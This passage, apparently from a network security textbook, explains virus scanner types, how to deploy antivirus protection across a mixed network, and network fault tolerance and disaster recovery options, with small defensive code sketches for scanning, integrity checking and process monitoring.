month. \nWhen a scanner checks a file, it looks to see if any of the code within the file matches any of the entries within the \nsignature file. When a match is found, the user is notified that a virus has been detected. Most scanners are then \ncapable of running a separate process that can clean the virus, as well. \nThe biggest limitation of virus scanners is that they can only detect known viruses. 
The biggest limitation of virus scanners is that they can only detect known viruses. If you happen to run across a newly created virus, a scanner may very well miss it. This is a particularly nasty problem when you are dealing with a polymorphic virus. As mentioned in "Polymorphic Mutation" earlier in this chapter, polymorphic viruses are capable of changing their signature with each infection. For a virus scanner to be 100 percent effective against this type of virus, it must have a signature file that lists all possible polymorphic permutations. If even one permutation is missed, the virus scanner may fail to clean an infected file—and the virus can again infect the system.

Tip
When selecting a virus scanner, look for one that is capable of detecting not only many different viruses, but many different polymorphic strains, as well.

Compressed or encrypted files can also cause problems for a virus scanner. Since both of these processes rearrange the way information is stored, a virus scanner may be unable to detect a virus hidden within the file.

For example, let's say you use PKZIP to compress a number of files in order to transport them on a floppy disk. You then use a virus scanner to check the disk in order to verify that none of the compressed files contains a virus. Unless the virus scanner you are using understands the ZIP file format (many do not), it will be unable to detect a virus hidden within one of the files.

This is even more of a problem with encrypted files. Since a virus scanner has no way to decrypt a manually encrypted file, it will most likely miss any viruses that are present. You must first decrypt the file and then perform a virus scan in order to insure that no viruses are present.

Virus Scanner Variations

There are two basic types of virus scanners:

• On demand
• Memory resident

On-demand scanners must be initialized through some manual or automatic process. When an on-demand scanner is started, it will typically search an entire drive or system for viruses. This includes RAM as well as storage devices such as a hard drive or a floppy disk.

Memory-resident virus scanners are programs that run in the background of a system. They are typically initialized at system startup and stay active at all times. Whenever a file is accessed, a memory-resident scanner intercepts the file call and verifies that no viruses are present before allowing the file to be loaded into memory.

Each of these methods has its trade-offs. On-demand scanners work after the fact: unless you always initialize the scanner before accessing any file (an unlikely occurrence unless you are very meticulous or very bored), your system will contract a virus before it is detected. While a memory-resident virus scanner is capable of catching a virus before it infects your system, it does so at a cost in performance. Every file scanned degrades the system's file access speed, thus slowing down the responsiveness of the system.
The manufacturers of memory-resident virus scanners are well aware that file access speed is important, and they recognize that many users would opt to disable the scanner rather than take a large performance hit. For this reason, many memory-resident scanners are not quite as thorough as their on-demand counterparts: better performance can be achieved by checking only for the most likely virus signatures, or by scanning only the files that are most likely to become infected (such as COM files).

Tip
A good security posture will include the use of both on-demand and memory-resident virus scanners.

Problems with Large Environments

All virus scanner vendors periodically release updated signature files to insure that their products can detect as many known viruses as possible. Updating signature files can create a great deal of extra work for system administrators who are responsible for large networking environments. If you are running DOS, Windows, or Macintosh operating systems on the desktop, you will most likely have signature files on each of these systems that need updating.

Many vendors have taken steps to rectify this problem. For example, Intel's LANDesk Virus Protect uses the concept of virus domains to group multiple servers and desktop machines. The network administrator can then update signature files, view alerts, and even control scanning parameters from a single console screen. This can dramatically reduce the amount of work required to administer virus protection in a large-scale environment.

A scaleable virus protection solution will not only reduce overall costs; it will help to insure that your environment remains well protected. As mentioned, virus scanning vendors periodically release updated signature files. These signature files are of little use, however, if they are not installed on every system that requires them. A scaleable solution will provide a simple method of distributing these signature files to all systems that require them. A solid enterprise solution will also include some form of advanced alerting function, so that the network administrator is notified of all viruses detected on any system on the network.

Heuristic Scanners

Heuristic scanners perform a statistical analysis to determine the likelihood that a file contains program code that may indicate a virus. A heuristic scanner does not compare code to a signature file the way a virus scanner does; it uses a grading system to determine the probability that the program code being analyzed is a virus. If the program code scores enough points, the heuristic scanner notifies the user that a virus has been detected. Most modern virus scanners include heuristic scanning ability.

One of the biggest benefits of heuristic scanners is that they do not require updating. Since files are graded on a point system, no signature files are required for comparison. This means that a heuristic scanner has a good probability of detecting a virus that no one else has ever seen. This can be extremely useful if you find that you are unable to update signature files on a regular basis.

The biggest drawback of heuristic scanners is their tendency to report false positives. As mentioned, virus code is not all that different from regular program code, which can make it extremely difficult to distinguish between the two. As system administrator, you may find yourself chasing your tail if you deploy a poor heuristic scanner that has a tendency to report nonexistent viruses.
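The grading idea can be sketched in a few lines. The traits and point values below are invented for illustration; a real heuristic engine weighs hundreds of code characteristics.

    # Hypothetical trait weights; a real engine grades far more signals.
    TRAITS = {
        b"\xcd\x13": 40,    # raw INT 13h disk access from application code
        b"\xcd\x21": 10,    # direct DOS interrupt calls
        b"*.EXE":    20,    # scanning the disk for executables to infect
    }
    THRESHOLD = 50          # score at which the file is flagged

    def heuristic_score(path):
        """Total the points for every suspicious trait found in the file."""
        with open(path, "rb") as f:
            data = f.read()
        return sum(points for pattern, points in TRAITS.items() if pattern in data)

    def looks_viral(path):
        return heuristic_score(path) >= THRESHOLD

A benign disk utility can easily score above the threshold, which is exactly the false-positive problem described above.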
Application-Level Virus Scanners

Application-level virus scanners are a newer breed of virus protection. Instead of securing a specific system from viruses, an application-level virus scanner secures a specific service throughout an organization.

For example, e-mail makes a wonderful transport for propagating viruses through file attachments. Trend Micro manufactures a product called InterScan VirusWall, which can act as an SMTP relay with a twist: instead of simply receiving inbound mail and forwarding it to the appropriate mail system, InterScan VirusWall can perform a full virus scan of all attachments before relaying them to an internal mail host.

Along with scanning SMTP traffic, InterScan VirusWall can scan FTP and HTTP traffic. This includes raw files, as well as many archive formats such as PKZIP. This helps to insure that all files received from the Internet are free of malicious viruses.

Tip
Many vendors now make products that integrate directly with existing firewall products. For example, Cheyenne Software makes a virus scanning plug-in for Check Point's FireWall-1 product. This allows virus scanning to be managed on the same system that is responsible for network security, giving the network administrator a single point of management for both security and virus protection.

Deploying Virus Protection

Now that you have a good idea of how viruses work and what tools are available to prevent infection, let's take a look at some deployment methods to safeguard your network.

Note
These suggestions should only be considered a guide; feel free to make modifications that better fit your specific needs.

Look at the network diagram shown in Figure 11.1. It shows a mixed environment that uses a number of different server operating systems. The desktop environment utilizes a mixture of operating systems, as well. Let's assume that you are consulting for the organization that owns this environment and you have been charged with protecting it from viruses, as well as Trojans and worms. You have also been asked to perform this task with a minimal impact on network performance. Take a moment to study the diagram and consider what recommendations you would make.

Figure 11.1: Sample network requiring virus protection

Protecting the Desktop Systems

While the desktop environment uses a mixture of operating systems, the hardware platform is consistent (PC compatible). This means that all desktop systems will be susceptible to many of the same types of viruses. You should try to standardize your desktop suggestions as much as possible, despite the fact that there are multiple operating systems in use.

Enable BIOS Boot Sector Protection

One of the most cost-effective suggestions you could make would be to enable boot sector protection through the systems' BIOS. This is a quick yet effective way to insure that the boot sectors of all systems remain secure. You would want to follow this up with some end-user education about what the boot sector warning means and how users should respond to it. Unless a user tries to upgrade his or her operating system, false-positive warnings should not be a problem.

On-Demand Scanning

Each desktop system should utilize an on-demand scanner configured to perform a full virus check of all local drives on a regular basis. This check could be scheduled to run nightly if desktop systems are typically left powered up at night.
If nightly virus scans are not an option, scans could be run during some other period of inactivity (such as lunchtime), or weekly as part of a server logon script.

It is important that the on-demand scanner check all local files to insure that a virus has not been planted through a dropper or sneaked in through some file with an obscure file extension. A proper on-demand scanner should include heuristic scanning capability, as well. There should also be some method of reporting all scanning results to a central location so that the data can be reviewed by a system administrator.

Memory-Resident Scanning

Each desktop should also launch a memory-resident scanner during system initialization to weed out viruses before they can be stored on the local file system or executed in memory. In the interest of performance, you may wish to tweak which files are checked by the memory-resident scanner.

Since you will be performing a regular on-demand scan of each desktop system, you have a bit of leeway in how meticulous you need to be in verifying files with your memory-resident scanner. By checking only the files that are most commonly infected by viruses, you can reduce the impact of the memory-resident scanner on system performance. While this diminishes your security posture a bit, the gain in system performance may be worth the slightly higher risk.

Your memory-resident scanner should check

• File reads only
• Worms
• Executable files such as COM and EXE files
• Macro-enabled documents, such as Microsoft Word and Excel

You want to check file reads—but not writes—because checking files that are written to disk would be redundant: if a scanner failed to find a virus when the file was read into memory, it is extremely unlikely that the same scanner will detect the virus when it is written to disk. You also want to check for worms, because many do not save any information to disk and thus may go undetected by an on-demand scanner. Finally, you want to configure your memory-resident scanner to check the files most likely to become infected. This includes executable files, as well as files that are capable of saving macro commands.
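Here is a minimal sketch of the filtering decision such a resident scanner might make, assuming made-up extension lists; commercial products implement this inside a file-system driver rather than in Python.

    EXECUTABLES = {".com", ".exe"}            # most commonly infected programs
    MACRO_DOCS = {".doc", ".xls"}             # files that can carry macro code

    def should_scan(event, filename):
        """event is 'read' or 'write'; return True if the file needs scanning."""
        if event != "read":                   # writes were already scanned on read
            return False
        name = filename.lower()
        return any(name.endswith(ext) for ext in EXECUTABLES | MACRO_DOCS)

    print(should_scan("read", "LETTER.DOC"))  # True
    print(should_scan("write", "LETTER.DOC")) # False: redundant check skipped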
Options Not Considered

I did not mention setting file attributes or checksum verification because, as you saw earlier, these methods are ineffectual against many strains of viruses. I did not mention other types of process monitoring (besides the BIOS boot sector warning) for the same reason. These suggestions are designed to provide the greatest level of protection with the least amount of labor.

One additional option, however, is to use file permissions on the NT/2000 workstations to prevent the user from having write access to any executable files. While this would decrease the chances of virus infection on these systems, it would also break from the standard configuration used on the other desktop machines. Since DOS and Windows 95/98/Me are not true multi-user operating systems, there is no way to restrict local user access to selective parts of the file system. This means that the NT/2000 workstation configuration would differ from that of the other desktop machines.

Also, this option does not address macro viruses, which are the most common form of virus found in the wild. These viruses hide within document files, and users must have write access to their document storage folders in order to save their files. With this in mind, this option may cause more problems than it solves.

Protecting the NT and NetWare Servers

Since the NT/2000 and NetWare servers are shared resources, they require a slightly different method of protection from the desktop machines. Virus protection on these systems is far more critical, because they can be used as a transport for propagating viruses between the desktop machines. In the case of the NT/2000 server, it can not only act as a transport; it can become infected itself, as well.

On-Demand Scanning

As with the desktop systems, configure the on-demand scanner to perform a full scan of all files on a nightly basis. Most server-based virus scanning products include a scheduler for just this purpose. If nightly backups are performed, the on-demand scanner should be set to scan the file system before the backup operation runs. This insures that all archived files are virus-free.

Memory-Resident Scanning

Memory-resident software designed for Windows NT will check the server's memory as well as files stored to the local file system. Memory-resident scanning operates in a slightly different fashion, however, when run from a NetWare server, because the server is incapable of running standard executables. Since the system is simply used for file storage, memory does not need to be checked; it is inbound network traffic that we are most concerned with scanning.

Your server-based memory-resident scanner should check

• Local memory for worms and Trojans (NT only)
• Inbound executable files from the network
• Inbound macro-enabled documents from the network

As with the desktop machines, this minimal file checking is done in the interest of improving performance. On the off chance that a virus sneaks through, you would expect the nightly on-demand virus scan to catch it.

Tip
You can gain some additional benefits by using products from different vendors to secure each part of your network from viruses. For example, you could use a product from one vendor on the servers and another on the desktop machines. Because no two vendors' signature files are identical, mixing and matching products can provide the maximum amount of virus protection.

File Permissions

As mentioned earlier in this chapter, setting user-level file permissions helps insure that executable files do not become infected. The benefits of this configuration will depend greatly on how applications are stored on the network. If all applications are stored on the local workstations, there will be no executables on the server to protect by setting read-only user-level access. If, however, all applications are launched from one or both of the servers, you can decrease the likelihood of virus infection by setting the minimum level of required permissions.

Options Not Considered

Neither process monitoring nor checksum verification was suggested, because both of these methods are less effective than running virus scanning software. Remember that the objective is to provide the greatest amount of protection while creating the least amount of administrative maintenance. The suggestions made achieve that goal.

Protecting the UNIX System

One important piece of information is missing: what exactly is the UNIX system used for? You have not been told whether it is a simple mail relay or a full-blown server accepting a full array of intranet services. The answer to this question could greatly affect your recommendation. For the purpose of this example, let's assume that this is an engineering system used to compile C code, and that users connect to the system via telnet and FTP.

Tip
Always make sure you have enough information to make an informed and logical decision!

File Integrity Checking

One of your biggest concerns with the UNIX system should be the possibility that someone will attempt to load a Trojan on the system in order to capture authentication information. By replacing the telnet server with one of her own creation, an attacker could record logon information from every user who authenticates with the system.

The easiest way to detect this type of activity is to perform a regular file integrity check. This should include a CRC checksum so that changes can be detected even if the current file has the same size and time stamp. You should verify the telnet and FTP servers, as well as any other process that accepts inbound connections. This check should run as an automated process, with the results analyzed on a different machine. By analyzing the results on a different machine, you are less likely to have the results altered by someone who has compromised the system.
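A scheduled sketch of such a check might look like the following. The daemon paths are typical but should be adjusted for the system at hand, and the report directory is hypothetical; the point is that a separate machine fetches and compares the reports.

    import hashlib
    import time

    SERVERS = ["/usr/sbin/in.telnetd", "/usr/sbin/in.ftpd"]   # adjust per system

    def fingerprint(path):
        """Hash the file's contents; a replaced binary changes the digest."""
        with open(path, "rb") as f:
            return hashlib.md5(f.read()).hexdigest()

    # Write a dated report for another machine to fetch and compare, so a
    # compromised host cannot quietly rewrite its own results.
    report = "/var/reports/integrity-%s.txt" % time.strftime("%Y%m%d")
    with open(report, "w") as out:
        for path in SERVERS:
            out.write("%s  %s\n" % (fingerprint(path), path))

Comparing today's report against yesterday's on the analysis machine flags any replaced binary, even one that keeps the original size and time stamp.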
Process Monitoring

Another concern with the UNIX machine is that someone may infiltrate the system with a worm, which would show up as a new process running on the system. As with the integrity check, you should automate this audit and analyze the results on a separate system. By knowing what should be running on the system, you can take action if a new process appears.
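One way to automate this, sketched below, is to diff the current process list against a known-good baseline. The baseline contents here are hypothetical, and the ps flags may vary slightly between UNIX variants.

    import subprocess

    # Hypothetical known-good process names for this machine.
    BASELINE = {"init", "in.telnetd", "in.ftpd", "cron", "syslogd"}

    def running_commands():
        """Return the set of command names currently running, via ps."""
        out = subprocess.run(["ps", "-e", "-o", "comm="],
                             capture_output=True, text=True).stdout
        return {line.strip() for line in out.splitlines() if line.strip()}

    for name in sorted(running_commands() - BASELINE):
        print("UNEXPECTED PROCESS:", name)    # candidate worm or Trojan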
\nDisaster recovery is all about contingency planning. Despite all the preparations that go into \ninsuring that the worst never happens, you need to have a backup plan that determines what you \nwill do when disaster becomes reality. This is your last line of defense between recovery and \ncomplete failure. \nIn Chapter 2, we discussed risk analysis and the importance of identifying your critical resources. \nWe also stressed placing a dollar value on resource unavailability in order to determine just how \nmuch downtime you can live with. In this chapter, we will discuss what options are available to you \nin keeping those resources accessible. \nDisaster Categories \nDisaster solutions fall into two categories: \nƒ Maintaining or restoring a service \nƒ Protecting or restoring lost, corrupted, or deleted information \nEach category has its place in guarding your assets, and no disaster solution is complete \nunless it contains elements from both categories. \nFor example, let’s say you have two hard drives installed in a server that are mirrored \ntogether. Mirroring insures that both disks always contain exactly the same information. When \nmirroring is used, a single hard drive failure will not bring down the entire server. The \nremaining hard drive can continue to provide file storage and give users access to previously \nsaved information. Mirroring is considered a disaster recovery service solution because it \nhelps to insure that file services remain available. \nNow let’s assume that a user comes to you and claims that she needs to retrieve a file that \nshe deleted three months ago. Despite the passage of so much time, this information is now \ncritical to performing her job, and the information cannot be re-created. \nIf mirroring is the only disaster recovery procedure you have in place on this file server, then \nyou are in deep trouble. While mirroring insures that files get saved to both hard drives in the \nmirrored pair, mirroring also insures that deleted files are removed in both as well. Mirroring \nprovides no way to recover this lost information, making it an ineffective information recovery \nsolution. \nTip \nWhen identifying a full disaster recovery solution, make sure you find methods to \nrecover from service failures as well as to recover lost information. Both are critical \nto insuring that you have a contingency plan in any disaster situation. \n \nNetwork Disasters \nWhile network disasters have the ability to shut down communications through an entire organization, they \nreceive very little attention compared to their server counterparts. Most organizations will take great strides to \ninsure that a server remains available. Very few subject the network to the same level of scrutiny, even though it is \nthe network that will get them to this server. Without a functioning network, a server is of little use. \nIn the next sections, we’ll review different network technologies and their potential vulnerabilities that might lead \nto loss of network functionality. Although this might seem to be a lot of information (and a lot of it is based on \ncommon sense), a thorough understanding of these vulnerabilities and characteristics in general contributes greatly \nto overall troubleshooting—especially when a failure is not readily apparent. \nMedia \nGood disaster recovery procedures start with your network media. 
While physical cables are still the predominant media for most LANs, wireless is rapidly growing as an option and must be considered as part of the overall disaster recovery plan. If you do choose cable, the cabling you select will go a long way toward determining how resilient your network will be in case of failure. Whichever media you choose will carry all of your network communications, so a failure at this level can be devastating.

Thinnet and Thicknet

Thinnet and Thicknet cabling date back to the original Ethernet specifications of the '70s. Both cable specifications allow multiple systems to be attached to the same logical segment of cable. This creates a single point of failure: if any portion of this length of cable becomes faulty, every system attached to it will be unable to communicate.

I can honestly say that out of the 100+ companies I have consulted for over the past two years, not one of them was considering a new network installation that included Thinnet or Thicknet cable. Unfortunately, at least 15 percent of them still used Thinnet to attach workstations and/or servers to the network. Two of them were still using Thicknet.

Tip: One of the biggest improvements you can make to network availability is to replace Thinnet and Thicknet cabling with a more modern solution.

Twisted Pair

Category 5 (CAT5) cabling is the current cabling standard for most network installations. While this will eventually be replaced with fiber due to increasing bandwidth requirements, the wide installation base of CAT5 cable will guarantee that it will be included in future topology specifications for at least a few more years. For example, while Gigabit Ethernet is based on fiber, concessions have been made to include CAT5 cabling for short cable runs (50–75 meters).

The problem arises from the amount of Category 3 (CAT3) cabling that is still in use, as well as the number of cabling installations that have only been tested for 10Mb operation. CAT5 does not guarantee that 100Mb or faster operation is possible; it only provides the ability to support these speeds. The CAT5 components must be properly assembled and tested to function properly.

It is entirely possible that CAT3 cabling or improperly installed CAT5 cabling will allow you to hook up 100Mb or higher devices and have them communicate with each other. Problems typically do not occur until a heavy load is placed on the network. Of course, a heavy load typically means that you have many users relying on network services. Problems due to poor cabling can take the form of slow network performance, frequent packet retransmissions due to errors, or even disconnection of users from services.

Your best preventive medicine for avoiding twisted-pair cabling problems is to test and certify your cables before use. If this is not possible, or if you have been pressed into using below-grade cabling, consider segmenting the problem areas with one or more switches. A switch has the ability to trap packet errors and to isolate transmissions into multiple collision domains. While this will not fix the errors, it will limit the scope of the effect that your cable problems have on the rest of your network.

Fiber Cabling

Since fiber uses light for transmitting network information, it is immune to the effects of electromagnetic interference (EMI).
On copper cabling, EMI can cause transmission errors, especially when the cabling is under heavy load. This immunity makes fiber an excellent choice for avoiding EMI failures, thus increasing the availability of the services the fiber cable is connecting.

Note: For a detailed discussion of fiber cable, see Chapter 4.

Excessive Cable Lengths

Every logical topology has specifications that identify the maximum cable lengths you can use. For example, 10Mb and 100Mb Ethernet both specify that twisted-pair cable runs cannot exceed 100 meters. These rules exist to insure that a system at one end of the cable run can properly detect the transmissions of a system located at the opposite end.

Exceeding these topology specifications for cable length can produce intermittent failures due to low signal strength and can slow down communications along the entire segment due to an increase in collisions. Since these problems will not be consistent, they can be very difficult to troubleshoot.

Tip: A good cable tester is the quickest way to tell if you have exceeded cable-length limitations for your logical topology.

Wireless Technologies

Some organizations are choosing wireless as their media of choice. While wireless technologies have existed for quite some time, slow transfer speeds and a lack of open, common standards have limited their market penetration until now. With the adoption of new technologies and standards (802.11b, in particular), high-speed wireless LAN (WLAN) is now technically feasible.

A WLAN is a transmission system that is designed to be location-independent, allowing network access using radio waves rather than a cable infrastructure. In corporate environments, WLANs are usually used as the final link between an existing wired network and a group of client computers.

However, there are still threats to a wireless infrastructure:

Interference: Although 802.11b is the preferred wireless LAN standard, other competing wireless standards still exist (HomeRF and Bluetooth). In the fall of 2000, the FCC ruled that HomeRF could increase its range of frequencies to overlap with that of 802.11b. While HomeRF uses frequency-hopping that allows traffic to move from frequency to frequency in search of the best signal (and avoid other signals), 802.11b does not. As a result, there is a very real possibility that stations running the 802.11b protocol could interfere with those running HomeRF.

Installation and configuration: What seems like the advantage of a wireless network can actually be the source of most of its problems. Mobile users have to be handed off from one AP (Access Point) to another, just as a cell phone is handed off from one cell tower to another as the caller moves between cells. If there are not enough APs to cover an area, or if they are incorrectly configured, communication with the network can be lost.

It is important to note that wireless technologies can be a positive part of any organization's disaster recovery plan—used as a backup in case there is a failure in the wiring infrastructure of an organization. Also, because WLANs are usually added gradually to an existing wire-based network, the wires themselves become the backup plan in case the WLAN fails.

Topology

The topology you choose can also have a dramatic effect on how resilient your network will be in case of failure.
As you will see in the following sections, some topologies do a better job than others of recovering from the day-to-day problems that can happen on any network. Changing your topology may not be an option. If not, this section will at least point out some of the common problems you may encounter and give you an idea of possible contingency plans.

Ethernet

Ethernet has become the topology of choice for most networking environments. When used with twisted-pair cabling, the topology can be extremely resistant to failure caused by cabling problems on any single segment. This helps to isolate problems so that only a single system will be affected. Of course, if this single system happens to be one of your servers, the break in connectivity can still affect multiple users.

The biggest flaw in Ethernet is that a single system is capable of gobbling up all of the available bandwidth. While this is an uncommon occurrence with modern network cards, older network interface cards (NICs) were prone to a problem known as jabbering. A jabbering network card was a NIC with a faulty transceiver that caused it to continually transmit traffic onto the network. This would cause every other system on the network to stop transmitting and wait for the jabbering card to finish. Since the faulty card would continue to jabber as long as it had power, network communications would grind to a halt.

Due to improvements in technology, jabbering network cards are now rare. The introduction of switching has also made jabbering NICs less of an issue. When a NIC jabbers, the packets it transmits are not legal Ethernet packets. This means that a switch checking for errors will reject these packets and not forward them on to the rest of the network. This isolates the problem system so that it does not affect the operation of other systems on the network.

Token Ring

While Token Ring was designed to be fault tolerant, it is not without its problems. Token Ring is a wonderful topology when all systems operate as intended. For example, a NIC attached to a Token Ring network is capable of performing a self-diagnostic check if other NICs on the ring inform it that there may be a problem. Obviously, a faulty NIC may not be able to perform a true diagnostic check. If the NIC thinks that it is OK, it will jump back into the ring and continue to cause problems.

One possible error condition with Token Ring is having a NIC detect, or be preprogrammed with, the wrong ring speed. Since Token Ring requires that each system successively pass the token to the next, a single NIC set to the wrong speed can bring down the entire ring. For example, let's say that every system on a ring is set to 16Mb. If a system joins this ring but has been hard set to 4Mb, all communication will stop. This is because the new system will pass the token too slowly, causing the other systems to think the token has become lost. When the token is passed along, the error condition clears—but only until the incorrectly configured system grabs the token again. This will cause the ring to flap back and forth between an operational and a dysfunctional state.

A Token Ring switch will mitigate the effect that a single system set to the wrong ring speed has on the rest of the network.
In fact, depending on the switch, this one system may very well be able to operate at 4Mb while the rest of the ring runs at 16Mb. Unfortunately, Token Ring switches are less popular and far more expensive than their Ethernet counterparts. This has severely limited their application in the field.

Note: An Ethernet network would not have the same difficulty. If a single system were set to the wrong topology speed, only that one system would be affected. All other systems would continue to communicate as usual.

What happens with Token Ring if two systems have the same media access control (MAC) number? In an Ethernet environment, a duplicate MAC only affects the two systems attempting to use the same number. In Token Ring, however, a duplicate MAC can bring down the entire ring. This is because Token Ring requires that every system keep track of the MAC address used by its upstream neighbor (the previous system on the ring) and its downstream neighbor (the next system on the ring). Duplicate MAC addresses completely confuse the systems on the ring as they attempt to figure out who is located where.

FDDI

Fiber Distributed Data Interface (FDDI) is also a ring topology, but a second ring has been added in order to rectify many of the problems found in Token Ring. This second ring remains dormant until an error condition is detected. When an error occurs, the FDDI systems can work together in order to isolate the problem area. FDDI is considered to be a dying technology because no effort has been made to increase speeds beyond 100Mb. The technology is still worth considering, however, due to its fault-tolerant nature.

Note: FDDI can be run in full duplex mode, which allows both rings to be active at all times. Enabling this feature, however, eliminates the use of the second ring for redundancy.

In an FDDI ring environment, each station is connected to both rings in order to guard against cable or hardware failure. Let's assume that you have a cable failure between two of the routers shown in Figure 12.1. When this cable failure occurs, the system immediately downstream from the failure will quickly realize it is no longer receiving data. It then begins to send out a special maintenance packet called a beacon. A beacon is used by ring stations to let other systems around the ring know that a problem has been detected. A beacon frame is a system's way of saying, "Hey, I think there is a problem between me and my upstream neighbor, because I am no longer receiving data from it." The station then initializes its connection on the secondary ring so that it can send and receive data on Connector A.

Figure 12.1: Four routers connected to an FDDI ring

The beacon packet continues to be forwarded until it reaches the beaconing system's upstream neighbor. This upstream neighbor then initializes its connection to the secondary ring by sending and receiving on Connector B. This, in effect, isolates the problem area and returns normal connectivity. When the beaconing station begins to receive its own beacons, it ceases transmission, and ring operation returns to normal. The final transmission path would resemble the network shown in Figure 12.2. By using beacon frames, the systems on the network can determine the failure area and isolate it by activating the secondary ring.
Figure 12.2: How FDDI stations recover from a cable failure

If this had, in fact, been a hardware failure caused by a fault in the upstream neighbor, and that system was unable to initialize the secondary ring, the faulty system's upstream neighbor would have detected this and stepped in to close the ring. This would isolate the problem hardware but allow the rest of the network to continue to function. Each router would continue to monitor the faulty links until connectivity appears to be restored. If the link passes an integrity test, the primary ring returns to full operation, and the secondary ring again goes dormant. This type of network fault tolerance can be deemed critical in environments where connectivity must be maintained seven days a week, 24 hours a day (referred to as 24 × 7 operation). This functionality is what still makes FDDI the most fault-tolerant networking topology available today for local area networks.

Note: FDDI also supports a star topology, which does not provide any redundancy. An FDDI network can consist of both star and ring connections.

802.11b (WLAN)

The 802.11b standard defines two primary players:

Station: Usually, this would be a PC equipped with a wireless NIC.

Access Point (AP): Acts as a bridge between a wired network and wireless computers. Consisting of a radio, a wired interface (Ethernet), and bridging software, the AP is the base that allows one or more stations to connect to the network.

802.11b also works in two modes:

Infrastructure: Also called a Basic Service Set (BSS), this mode describes a wireless network in which at least one access point is connected to a wired network and serves a group of one or more wireless stations. Two or more BSSs in a single subnetwork form an Extended Service Set (ESS). Infrastructure mode is the most common for corporate environments.

Ad Hoc: Also known as Independent BSS (IBSS) or peer-to-peer mode, this consists simply of a group of wireless stations that communicate directly without the bridging services of an AP.

Like Ethernet (802.3), 802.11b forces the sender to listen to the medium before transmitting. In Ethernet, the full access protocol is known as Carrier Sense Multiple Access with Collision Detection (CSMA/CD). In a wireless network, however, collision detection is not possible, because a station cannot transmit and listen at the same time—and therefore cannot "hear" a collision occurring.

To compensate, 802.11b uses a modification called Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA). CSMA/CA works like this: the sender listens, and if no activity is detected, it waits an additional random amount of time and then transmits. If the packet is received intact, the receiver issues an acknowledgment to the sender, which completes the process. If an acknowledgment isn't received, a collision is assumed, and the packet is retransmitted. Unfortunately, CSMA/CA adds additional overhead, which means that an 802.11b network will be slower than an equivalent speed Ethernet network.
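The listen, back off, transmit, and acknowledge cycle is easier to see in code. The following sketch is a simplified illustration of the CSMA/CA logic just described, not an implementation of the real 802.11b MAC; the channel object, timing values, and retry limit are all invented for the example.

import random
import time

SLOT_TIME = 0.001   # seconds; real 802.11b slot times are far shorter
MAX_RETRIES = 7     # invented retry limit for the example

def send_with_csma_ca(channel, frame):
    """Illustrative CSMA/CA: listen, back off randomly, transmit, await ACK."""
    for attempt in range(MAX_RETRIES):
        # Carrier sense: wait until no other station is transmitting.
        while channel.busy():
            time.sleep(SLOT_TIME)
        # Collision avoidance: wait an additional random number of slots.
        # The contention window grows after each failed attempt.
        window = 2 ** (attempt + 4)
        time.sleep(random.randint(0, window - 1) * SLOT_TIME)
        channel.transmit(frame)
        # An intact delivery is confirmed by an acknowledgment; no ACK
        # means we assume a collision and retransmit.
        if channel.wait_for_ack(timeout=0.01):
            return True
    return False

The growing contention window is the design choice that keeps a busy cell degrading gracefully: each unsuccessful sender waits, on average, longer before trying again.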
Another potential problem is known as the "hidden node," in which two stations on opposite sides of an access point can each "hear" activity from the access point but not from each other. Fortunately, 802.11b has an option called Request to Send/Clear to Send (RTS/CTS). This protocol dictates that a sender transmit an RTS first and then wait for a CTS from the AP. Since all stations can hear the AP, waiting for the CTS causes them to delay transmitting, allowing each sender to communicate with little chance of a collision. RTS/CTS adds overhead, however, which is another potential negative.

Designing a WLAN with multiple APs avoids having a single point of failure. Although reassociation with a new AP usually occurs because the station has physically moved away from its original AP, it can also occur if there is a change in radio characteristics or high network traffic—essentially providing a load-balancing feature.

Leased Line or T1 Connections

Private-circuit WAN topologies, such as leased lines or T1 connections, are good at insuring privacy, but they also introduce a single point of failure. A leased line or T1 circuit is the equivalent of a single, long cable run between two of your geographically separated sites. If any portion of this circuit is interrupted, there is no built-in redundancy to insure that information can still be exchanged between these two sites.

If you will be using a private circuit, consider an analog or ISDN redundancy option, discussed later in this section. This is particularly important if you are following the latest trend of removing servers from field offices and consolidating them in a central location. While this provides a single point of management, it also creates a single point of failure. If a field office that does not have a server loses its private circuit connection to the main office, that field office is without network resources. If the company had also moved to a thin-client architecture, this field office would be down completely.

Frame Relay

Frame relay is also capable of providing WAN connectivity, but it does so across a shared public network. This network is packet switched, meaning that if any segment within the frame relay cloud experiences a failure, traffic can be diverted across operational links. While this may cause a bit of traffic congestion, at least you still have connectivity.

It is not impossible, however, for the entire frame relay network to go down. This has happened recently to both MCI and AT&T. In both cases, all customers experienced downtime, varying from a few hours to a few days depending on the client's location. While outages are rare, these failures have shown that they are possible.

Tip: While frame relay does provide better fault tolerance than private circuits, it is not immune to failure. If you have a WAN segment running over frame relay that absolutely must remain operational 24 × 7, consider building some redundancy into the circuit.

Integrated Services Digital Network (ISDN)

ISDN is a telephone company technology that provides digital service, typically in increments of 64Kbps. ISDN has been available since the early 1980s, but it only saw broad implementation in the latter part of the '90s because of the limitations of analog modems and the rising popularity of the newer packet-switched technologies. ISDN requires that the phone company install services within its phone switches to support digitally switched connections. ISDN was initially stalled by high costs, lack of standards, and low acceptance by consumers.
Because the circuits involved in an ISDN connection are dedicated, any interruption of a single circuit will cause the entire connection to fail. While ISDN is still a viable option for some organizations—and in some areas the only choice for cheap Internet access—most modern companies find that emerging DSL technology is cheaper and more flexible, although even DSL has been plagued with its own implementation problems. Still, ISDN remains a known technology that has a solid performance history and no recent history of major failures.

Digital Subscriber Line (DSL)

Digital Subscriber Line (DSL) is similar to ISDN in that both use existing copper telephone lines and both require short distances to a central switching office (less than 18,000 feet). DSL is circuit-oriented, but instead of utilizing fixed physical circuits for the entire length of the connection, DSL simply needs a complete circuit to the local exchange carrier's point of presence (POP). This dramatically reduces the number of failure points in any given connection. DSL can also provide a dramatically higher level of speed than ISDN—up to 32Mbps downstream and up to 1Mbps upstream. This speed is not fixed as it is with ISDN or a T1, which can cause problems for organizations that require dedicated throughput (in both directions of the connection) for video conferencing or other multimedia uses.

Single Points of Failure

As you may have surmised from the previous section, one of the best ways to eliminate disasters on a network is to identify single points of failure and either build in redundancy or develop a contingency plan. Unknowingly creating a single point of failure is the most common mistake made in a network design.

For example, consider the configuration of the average Internet connection:
• A single firewall
• A single router
• A single CSU/DSU
• A single leased line or T1 connection

